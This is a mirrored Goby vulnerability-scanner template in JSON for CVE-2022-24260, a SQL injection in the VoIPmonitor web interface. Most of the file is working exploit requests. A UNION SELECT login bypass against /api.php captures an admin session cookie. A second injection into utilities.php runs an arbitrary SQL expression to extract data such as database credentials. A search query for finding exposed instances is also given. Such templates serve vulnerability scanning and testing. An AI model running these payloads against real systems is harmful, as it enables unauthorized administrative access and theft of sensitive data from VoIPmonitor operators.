qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/VoipMonitor-utilities.php-S...

234 lines
8.8 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "VoipMonitor utilities.php SQL Injection (CVE-2022-24260)",
"Description": "<p>VoIPmonitor is an open source network packet sniffer from the VoIPmonitor team.<br></p><p>Voipmonitor has a SQL injection vulnerability, which allows to obtain administrator privileges and use the utilities.php file to inject sensitive information such as database user passwords.<br></p>",
"Product": "voipmonitor",
"Homepage": "https://www.voipmonitor.org",
"DisclosureDate": "2022-03-23",
"Author": "abszse",
"FofaQuery": "title=\"VoIPmonitor\"",
"GobyQuery": "title=\"VoIPmonitor\"",
"Level": "3",
"Impact": "<p>Voipmonitor has a SQL injection vulnerability, which allows to obtain administrator privileges and use the utilities.php file to inject sensitive information such as database user passwords.<br></p>",
"Recommendation": "<p>Precompile the data entered by the user.</p><p>Set up whitelist access through security devices such as firewalls.</p><p>The manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is: <a href=\"https://www.voipmonitor.org/changelog-gui?major=5.\">https://www.voipmonitor.org/changelog-gui?major=5.</a></p>",
"References": [
"https://kerbit.io/research/read/blog/3"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "user()",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"success\":true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "_vm_version",
"bz": ""
}
]
},
"SetVariable": [
"PHPSESSID|lastheader|regex|Set-Cookie: PHPSESSID=(.*?);"
]
},
{
"Request": {
"method": "POST",
"uri": "/php/model/utilities.php",
"follow_redirect": false,
"header": {
"Cookie": "PHPSESSID={{{PHPSESSID}}}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "task=loadConfigSubsystem&params={\"subsystem\": \"tracker\", \"name\":\"name\", \"user_id\":\"'UNION SELECT md5(345) #\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "d81f9c1be2e08964bf9f24b15f0e4900",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/api.php",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "\"success\":true",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "_vm_version",
"bz": ""
}
]
},
"SetVariable": [
"PHPSESSID|lastheader|regex|Set-Cookie: PHPSESSID=(.*?);"
]
},
{
"Request": {
"method": "POST",
"uri": "/php/model/utilities.php",
"follow_redirect": false,
"header": {
"Cookie": "PHPSESSID={{{PHPSESSID}}}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "task=loadConfigSubsystem&params={\"subsystem\": \"tracker\", \"name\":\"name\", \"user_id\":\"'UNION SELECT {{{cmd}}} #\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"SQL Injection"
],
"VulType": [
"SQL Injection"
],
"CVEIDs": [
"CVE-2022-24260"
],
"CNNVD": [
"CNNVD-202202-315"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "VoipMonitor 开源网络数据包嗅探器 utilities.php 文件 SQL注入漏洞(CVE-2022-24260)",
"Product": "voipmonitor",
"Description": "<p>VoIPmonitor是VoIPmonitor团队的一个开源网络数据包嗅探器。<br></p><p>Voipmonitor 存在SQL注入漏洞该漏洞允许获取管理员权限并且利用utilities.php 文件注入可获得数据库用户密码等敏感信息。<br></p>",
"Recommendation": "<p>1、对用户输入的数据进行预编译处理。</p><p>2、通过防火墙等安全设备设置白名单访问。</p><p>3、厂商已发布升级补丁以修复漏洞补丁获取链接<a href=\"https://www.voipmonitor.org/changelog-gui?major=5\">https://www.voipmonitor.org/changelog-gui?major=5</a>。</p>",
"Impact": "<p>Voipmonitor 存在SQL注入漏洞该漏洞允许获取管理员权限并且利用utilities.php 文件注入可获得数据库用户密码等敏感信息。<br></p>",
"VulType": [
"SQL 注⼊"
],
"Tags": [
"SQL 注⼊"
]
},
"EN": {
"Name": "VoipMonitor utilities.php SQL Injection (CVE-2022-24260)",
"Product": "voipmonitor",
"Description": "<p>VoIPmonitor is an open source network packet sniffer from the VoIPmonitor team.<br></p><p>Voipmonitor has a SQL injection vulnerability, which allows to obtain administrator privileges and use the utilities.php file to inject sensitive information such as database user passwords.<br></p>",
"Recommendation": "<p>Precompile the data entered by the user.</p><p>Set up whitelist access through security devices such as firewalls.</p><p>The manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is: <a href=\"https://www.voipmonitor.org/changelog-gui?major=5.\">https://www.voipmonitor.org/changelog-gui?major=5.</a></p>",
"Impact": "<p>Voipmonitor has a SQL injection vulnerability, which allows to obtain administrator privileges and use the utilities.php file to inject sensitive information such as database user passwords.<br></p>",
"VulType": [
"SQL Injection"
],
"Tags": [
"SQL Injection"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink